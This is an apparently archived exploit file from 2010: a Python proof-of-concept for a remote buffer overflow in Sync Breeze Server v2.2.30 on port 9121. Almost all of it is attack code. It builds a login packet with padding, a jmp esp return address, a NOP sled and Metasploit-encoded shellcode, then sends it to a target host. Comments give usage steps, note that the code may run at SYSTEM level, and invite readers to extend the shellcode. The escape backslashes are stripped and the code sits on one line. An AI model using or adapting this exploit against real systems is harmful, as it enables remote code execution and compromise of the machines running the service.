syncbreeze-overflow.txt
Posted on 11 October 2010
#!/usr/bin/python # Exploit Title: Sync Breeze Server v2.2.30 Remote BOF Exploit # Date: 10/10/2010 # Author: Xsploited Security [aka xsploitedsec] # URL: http://www.x-sploited.com/ # Contact: xsploitedsecurity [at] x-sploited.com # Software Link: http://www.syncbreeze.com/setups/syncbreezesrv_setup_v2.2.30.exe # Version: v2.2.30 (Others are most likely effected as well) # Tested on: A Windows XP SP3 machine # CVE : N/A ### Vulnerability Information: ### # A vulnerability exists in the way Sync Breeze v2.2.30 processes its login requests after accepting a connection from a remote client. # If a packet with a length greater than 484 bytes is received with the command prefix "ServerLogin." the effected Service (syncbrs.exe) # will crash, from the result of a buffer overflow. An attacker can easily leverage this vulnerability and control execution flow / # execute arbitrary code. ### # This PoCs Usage: # 1. Verify that the service is running on the remote machine, the default port is 9121. # 2. Execute syncbreeze.py against the host # 3. Check remote machines process list for calc to verify successful command execution. (Running as SYSTEM, on my test machine at least..) ### # Other notes: # If the software is installed from an administrator account, shellcode will be executed at admin / (system) level. This could be a potential # privelage escilation attack vector (although I have not verified this yet) # I am sure a lot more can be done with this (fit more shellcode, universal etc.) I'll leave that up to researchers however. # Have fun! ### ### Shouts: # kAoTiX - Helping me verify this bug/exploit # MAX - Keeps me entertained, makes me giggle # CorelanCoder - Your tutorials are absolutely fking awesome # exploit-db, offensive-sec, packetstormsecurity and all security teams and sites! ### import sys,socket if len(sys.argv) != 2: print "[!] Usage: ./syncbreeze.py <Target IP>" sys.exit(1) about = "================================================= " about += "Title: Sync Breeze Server v2.2.30 Remote BOF PoC " about += "Author: xsploited security URL: http://www.x-sploited.com/ " about += "Contact: xsploitedsecurity [at] gmail.com " about += "================================================= " print about host = sys.argv[1] port = 9121 #default server port, unchangeable (I think) # windows/exec - 218 bytes / http://www.metasploit.com # Encoder: x86/fnstenv_mov / EXITFUNC=seh, CMD=calc calc = ("x6ax31x59xd9xeexd9x74x24xf4x5bx81x73x13x97x8c" "x8ax10x83xebxfcxe2xf4x6bx64x03x10x97x8cxeax99" "x72xbdx58x74x1cxdexbax9bxc5x80x01x42x83x07xf8" "x38x98x3bxc0x36xa6x73xbbxd0x3bxb0xebx6cx95xa0" "xaaxd1x58x81x8bxd7x75x7cxd8x47x1cxdex9ax9bxd5" "xb0x8bxc0x1cxccxf2x95x57xf8xc0x11x47xdcx01x58" "x8fx07xd2x30x96x5fx69x2cxdex07xbex9bx96x5axbb" "xefxa6x4cx26xd1x58x81x8bxd7xafx6cxffxe4x94xf1" "x72x2bxeaxa8xffxf2xcfx07xd2x34x96x5fxecx9bx9b" "xc7x01x48x8bx8dx59x9bx93x07x8bxc0x1exc8xaex34" "xccxd7xebx49xcdxddx75xf0xcfxd3xd0x9bx85x67x0c" "x4dxfdx8dx07x95x2ex8cx8ax10xc7xe4xbbx9bxf8x0b" "x75xc5x2cx72x84x22x7dxe4x2cx85x2ax11x75xc5xab" "x8axf6x1ax17x77x6ax65x92x37xcdx03xe5xe3xe0x10" "xc4x73x5fx73xf6xe0xe9x10"); # Begin payload buffer: packet_header = ("x53x65x72x76x65x72x4Cx6Fx67x69x6Ex02"); junk = "x90" * 256; #265 byte junk buffer to reach eip eip = "xFBxF8xABx71"; #jmp esp (via ws2_32.dll) nops = "x90" * 12; #small nop sled # packet structure: # [header][junk][eip][nops][shellcode][nops][nops] packet = packet_header + junk + eip + nops + calc + nops + nops; print "[*] Connecting to " + host + "... " s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) print "[*] Connected, Sending payload " s.send(packet + " ") print "[*] Payload sent successfully" print "[*] Check the results " s.close()
